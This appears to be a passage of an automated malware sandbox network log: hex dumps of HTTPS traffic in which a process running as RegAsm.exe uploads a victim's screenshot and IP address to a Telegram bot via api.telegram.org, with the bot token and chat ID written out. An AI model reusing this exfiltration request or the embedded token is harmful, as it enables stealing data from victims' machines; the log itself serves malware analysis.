92 7e 9a a7 8f 10 44 ee 21 f5 38 fa 2b b9 47 ab 63 c0 12 84 54 08 4a 02 82 64 21 2f 11 99
                                                                            Data Ascii: x@O+,O',xo8OPoJU~#>ab_/1`U1oV5v H}-qS[Q;$EtII?|xA`L{ioZ~m!y'J?(_+o$$%&~~D!8+GcTJd!/
                                                                            2025-01-09 10:38:20 UTC16355OUTData Raw: fc eb 85 00 1c 60 ff d8 b6 c2 95 7e 16 47 fa 59 ac e4 6b c7 10 31 d7 22 de 6b de ed 02 50 f4 05 a0 4f 5f 00 f6 e9 f3 de 84 7f 07 3c 03 70 60 93 23 42 bb 67 00 a6 97 81 94 82 0e f1 a7 4a c0 34 1e 06 89 40 f5 c1 4a c1 4e 04 20 f3 08 40 c6 9a 23 06 de 91 5f 84 9f ad fa b3 82 d0 ca bf a2 ef 0b c0 ea d9 80 0b 07 e5 9f 9e 07 68 63 08 3d bd f1 57 72 4f 12 90 56 47 80 73 34 6f 85 9e 27 00 d5 4a 06 e6 c2 d0 8a be 1c c9 41 a1 98 8e 0b 83 aa fb 54 e1 a7 63 c0 92 7d aa fa 13 79 be 64 1e f2 0e 41 27 01 28 b9 97 23 99 07 92 79 c4 db 09 40 e2 aa 18 b4 73 e9 3a b3 6f 4c 82 4f cf f9 43 ea 21 ff 10 7f 8c 25 ff 54 f1 a7 1c aa 02 99 93 f4 a3 45 ee d9 0a 40 c5 e9 13 a7 55 1c 01 98 e2 a6 fa 0f a9 07 8c 25 05 ad 00 54 dc 0a 40 7b cc d7 13 74 76 4e 52 4f 79 ca cd e5 9e 72 69 ed
                                                                            Data Ascii: `~GYk1"kPO_<p`#BgJ4@JN @#_hc=WrOVGs4o'JATc}ydA'(#y@s:oLOC!%TE@U%T@{tvNROyri
                                                                            2025-01-09 10:38:20 UTC16355OUTData Raw: 40 f0 44 5f 2b 3c 89 37 1a de 6b 02 d0 93 7c c3 d1 17 80 7d fa 8c 1e fe 1d d4 a7 7e 25 34 36 3e 3c 34 e6 fe 38 20 00 07 10 77 46 fc a5 e7 01 ea 39 7f 06 c5 87 13 80 79 05 a0 40 08 02 12 2f 97 7e 9e 10 d4 78 08 56 da c5 9c fc 99 82 76 2e 8f 49 00 da 98 90 e4 e3 79 81 9d 08 40 c8 2b fc ac e8 a3 95 24 b4 0c 27 00 6d 8c be 9e fd c7 d8 0a c0 ea c8 6f 79 04 98 37 fe 82 04 a0 8e fc 5a 10 80 12 7e 1a 43 51 21 18 f7 2d 65 9e 24 9f 64 9e c6 42 d5 81 c4 41 e2 4f 52 b0 9d 00 94 98 43 c6 e5 82 0e 24 f0 6c 4c 39 42 d2 30 c7 ce d9 75 08 3f da 89 db c5 ef b3 9c ab 44 5f 44 cf 06 54 05 60 92 83 e5 91 5d 2b f8 80 18 42 0f d1 c7 5c 71 ac b7 90 82 12 80 8c 91 7d 3c 03 50 7b 0c 42 5e 81 e4 1f 47 80 69 41 c7 7b 25 f4 90 76 aa ea 53 95 1f 2d 79 f9 bc e6 5a 89 c0 22 af 59 fe 31
                                                                            Data Ascii: @D_+<7k|}~%46><48 wF9y@/~xVv.Iy@+$'moy7Z~CQ!-e$dBAORC$lL9B0u?D_DT`]+B\q}<P{B^GiA{%vS-yZ"Y1
                                                                            2025-01-09 10:38:20 UTC16355OUTData Raw: 93 77 d3 c0 1e 40 3f 8a 3c 5a f6 36 06 48 c0 18 8f fb 44 cc 8f 02 50 f1 17 c7 56 04 2a 01 95 7d e0 d8 dc 28 04 01 11 88 48 b3 82 4f 71 46 df 23 b8 a5 50 83 28 e4 62 df 3c c6 1b df d0 ca 41 84 a2 39 cc e5 aa bc b0 17 63 f7 21 3f e6 51 c5 17 73 23 e6 d3 27 a7 84 f5 60 65 5f 14 81 88 3b 45 5f 8c 2b 02 a3 14 b4 4f 7e ac 22 04 d6 cc 04 e0 12 44 59 55 9b af 49 bd 69 c8 7b bf 8c 04 a0 2c ff 79 e9 cf 7c 95 02 b0 16 ef f7 a4 5f d2 09 41 88 02 30 a2 0c a4 22 70 f4 56 e1 f4 e7 e4 6d c2 15 f9 47 4c f1 47 1b fb 4a bb 99 00 6c a9 49 bf 48 4d da ad 25 35 b9 b7 1c 6a 82 6e 67 33 13 80 29 56 91 72 bb 92 99 00 4c eb d7 90 9a cc 5b 09 35 f9 07 35 a9 37 0d 35 d9 57 a3 26 f5 a6 a1 26 ff a0 26 f9 26 81 e0 5b 8a bd 45 00 22 f6 3c 0e cc fc 6f fe e6 6f 8e e4 21 01 a1 dc 87 31 d5
                                                                            Data Ascii: w@?<Z6HDPV*}(HOqF#P(b<A9c!?Qs#'`e_;E_+O~"DYUIi{,y|_A0"pVmGLGJlIHM%5jng3)VrL[5575W&&&&[E"<oo!1
                                                                            2025-01-09 10:38:20 UTC16355OUTData Raw: a6 b1 f2 2f 56 00 ba d7 e0 98 5b 86 de 15 e8 65 20 1e 01 a6 ea 2f 0a bf 28 00 f3 25 1f 9d bc 1b 47 ac 08 8c b2 0f 14 80 8a 41 84 1f 2d 6b 68 a9 08 8c c7 7d 81 77 08 0e 8f 17 05 a0 d5 80 51 08 f6 15 84 87 df 94 ab fe 90 7f f1 7d 81 c6 95 7e 25 08 3b b1 aa 2f ca 3e e3 31 16 a5 df e0 d0 6b 9b b9 37 5f 97 c7 0a 40 50 02 72 ec 17 d9 47 25 20 6d 3c 06 8c 10 54 e8 29 fa 14 7f 35 11 68 b5 20 f4 62 b0 93 7a c8 3c 50 f6 11 43 fe 8d 08 bf c3 6f c9 30 97 a5 61 8a 2b ef 68 11 7d 4a bf 28 fe 14 82 e6 58 f1 17 a5 1f e3 7e 8f 83 53 ab 64 4b fd 88 e2 0d e8 47 21 07 4a 3a 72 87 64 5d 65 1f aa fe cc 65 6c 3e 63 44 21 63 63 b4 ec ad 34 24 07 e1 67 e5 5e 94 77 0a 3e 88 73 11 05 20 f9 ec a3 3c 54 fe 65 21 b8 df a2 a8 a3 55 fc 89 02 8f 7e 14 7a ce 5b 29 18 21 47 c1 17 e5 5e 7c
                                                                            Data Ascii: /V[e /(%GA-kh}wQ}~%;/>1k7_@PrG% m<T)5h bz<PCo0a+h}J(X~SdKG!J:rd]eel>cD!cc4$g^w>s <Te!U~z[)!G^|
                                                                            2025-01-09 10:38:20 UTC16355OUTData Raw: cb fc f8 c7 3f 1e 2b 00 bf fb dd ef 36 8f 3e fa e8 cb 4c 00 9e da 49 ad ae 62 2d a1 8c 5a 6b 46 a4 d6 87 3e 5c 17 78 ab a5 22 ff a0 26 f5 6a 8c cb ad 7d 57 99 6d cf 65 f1 e7 cf 49 f5 23 ef f3 ab c9 be 08 39 b1 52 32 5e fc 51 fb ae 6a 32 6e a7 e0 51 d9 da 5c a2 26 fd 5a b6 66 e6 ce 79 b2 23 7d 97 cb a1 90 7f 0b 4b 30 df 09 c3 dc 2f 50 08 46 31 38 7f fe f6 0c 37 06 c3 c6 8b 5f ca 6c b8 e8 c5 cc a6 0b 5f 6c 36 6e 79 a1 e5 c2 94 d3 55 07 42 be 50 c4 f7 07 9e 8e dc 4b e4 fe 13 a3 20 0e a9 22 9c 52 f8 95 ec ed 02 70 6a 38 56 dc a1 c4 ab 5d fe 21 0b a7 3c 36 91 9a a4 db 99 ac bd 00 7c a4 27 5e ee 31 38 21 fd df 97 44 8c 2d 07 d7 49 dc bf 46 4d ea 4d 43 4d fe 45 6a d2 2f b2 b3 05 60 4d f0 2d 45 4d fa 45 f6 44 01 88 e8 e3 18 f0 07 3f f8 c1 91 38 63 da 9f fa a9 9f
                                                                            Data Ascii: ?+6>LIb-ZkF>\x"&j}WmeI#9R2^Qj2nQ\&Zfy#}K0/PF187_l_l6nyUBPK "Rpj8V]!<6|'^18!D-IFMMCMEj/`M-EMED?8c
                                                                            2025-01-09 10:38:20 UTC16355OUTData Raw: 69 ed 4a cb dd fc d0 d4 3a e4 a2 ea 3b b2 71 ce 59 b1 2a b5 3e 60 df 11 f3 af ac bf 23 f6 22 77 f3 35 36 b6 5f b6 df e4 d8 5e eb 90 43 f3 ba bc 76 c5 c5 16 bb 77 32 46 25 20 62 af 26 3a ca dc fa f4 af 1a 7c dc d3 08 c2 13 6f b4 7f 68 f2 73 ba 25 ad d8 e3 f8 d4 36 5a 7b ac ae 7e 4e fb ef 91 5a 7f 79 e2 e4 7b b6 cf bf e9 e7 ee 49 e9 e7 17 a5 4d f9 2e f6 ff df b6 ee 27 69 c5 1b ec fb 86 b7 7e cf 3e a7 fd 5e c8 9f f3 b2 1c cf a2 f0 08 fb bd 70 bc bd c6 2f ea 3f b3 6f 3d b6 91 80 59 fe bd ff aa ea 3b 3b c9 be 23 a4 df 81 f6 b9 2d b6 92 f1 2b ea ef ec 60 fb 7e 88 93 0f 07 d6 df 8b 8f 23 e4 06 24 92 7a 5d ac f9 4d 5f 5a e7 d9 ef bf 7e 04 52 6f 21 29 85 60 7c 51 c8 ec 69 9d fb f8 34 d8 fb 08 98 7a 54 b8 17 53 65 e1 20 e4 ea bc 3e e8 92 91 29 97 8d 04 20 0b 25 0e
                                                                            Data Ascii: iJ:;qY*>`#"w56_^Cvw2F% b&:|ohs%6Z{~NZy{IM.'i~>^p/?o=Y;;#-+`~#$z]M_Z~Ro!)`|Qi4zTSe >) %
                                                                            2025-01-09 10:38:20 UTC16355OUTData Raw: 3e 28 85 20 31 c9 3c f0 12 90 96 39 90 00 a4 65 2e 8f eb db 82 11 79 12 7b 4b 76 b3 ef c6 de 2f 63 a0 af 98 a4 9f 8e 10 d3 6f ed 70 69 be 1d d8 1f 0b 56 ab 0b 43 e8 fb e3 c3 1c 0b d6 2d c2 ac 95 14 94 e4 2b 91 24 a4 5f e6 d1 47 f6 51 f5 87 cc 2b 05 20 b1 7e 02 30 e7 f3 ec ba 02 49 41 50 25 a0 97 7f 8c e9 23 00 a9 e8 43 e4 49 fa 49 00 7a 09 c8 7c 96 7d 3b d8 9a fa 08 32 c7 8a 59 8b d8 f3 c7 7e 25 f6 84 2e 0e 11 cc 93 c7 71 e0 09 2a 1a 0b f1 37 29 e6 26 2b fe 10 79 8a 79 c9 87 fc 03 f6 50 25 a0 f2 a8 2c 04 ed 47 8e 50 ac ca e3 35 88 f3 1a f6 19 9d fc 03 09 39 89 3a 90 d8 43 c0 29 56 8a 39 d0 d8 8b 3d 9f ab be 5a ad 41 0c b6 5f ff dd dc 2a 57 79 25 73 13 80 1c ff 7d db 17 d3 a6 17 de 93 d6 9d be b5 6d d6 ca 6c ba 72 5d 4a 17 1d 93 5a 2f f9 0b fb 83 f7 b9 b4
                                                                            Data Ascii: >( 1<9e.y{Kv/copiVC-+$_GQ+ ~0IAP%#CIIz|};2Y~%.q*7)&+yyP%,GP59:C)V9=ZA_*Wy%s}mlr]JZ/
                                                                            2025-01-09 10:38:20 UTC16355OUTData Raw: df 0b 3d 5a 90 00 54 4c 63 cd 4b fe d1 1f 09 c0 40 7a 8d 98 24 92 76 c3 24 92 73 0b 41 24 d3 22 66 bb 6e a6 c4 17 77 4c 12 49 bd 41 88 a4 dd 30 89 a4 de 20 44 d2 6e 98 44 d2 6f 98 84 52 6f 10 d8 63 01 89 e4 de 4c 88 e4 dd 30 88 a4 de 20 3c 9f 04 20 44 f2 0f 3a 81 fc 83 8d 51 00 7a 22 a9 e7 89 d6 78 3a a7 f7 07 c1 e6 e9 da bf 16 80 63 8e ce 29 f6 39 6b bc 0c 94 28 f4 64 09 c8 d1 e0 3e 8c 9f b5 3e b3 68 15 55 80 08 c0 67 a7 48 41 84 60 7e 76 a0 7d 9e aa 3a b0 3e 2a 0c fe 02 91 90 6e 01 28 4a 51 18 c9 bf 4c 20 f8 a6 63 24 00 47 8c 98 99 00 f4 22 b0 14 80 42 73 fe 88 b0 aa 00 bb a4 9e 8d 3d bd 24 61 17 47 dd 91 25 a0 84 21 7d 1d 07 2e 05 60 24 01 25 f6 4a e1 27 31 58 4a 41 09 40 55 fc 95 50 21 e8 c9 31 c4 de e1 b7 e5 6a 40 09 40 60 ae 97 fc 9b 1c 57 32 0f b1
                                                                            Data Ascii: =ZTLcK@z$v$sA$"fnwLIA0 DnDoRocL0 < D:Qz"x:c)9k(d>>hUgHA`~v}:>*n(JQL c$G"Bs=$aG%!}.`$%J'1XJA@UP!1j@@`W2
                                                                            2025-01-09 10:38:21 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:21 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.449754149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:22 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd3162fe5544a6
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:22 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 36 32 66 65 35 35 34 34 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd3162fe5544a6Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:22 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:22 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:22 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:22 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:22 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:22 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:22 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:22 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:22 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:24 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:24 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
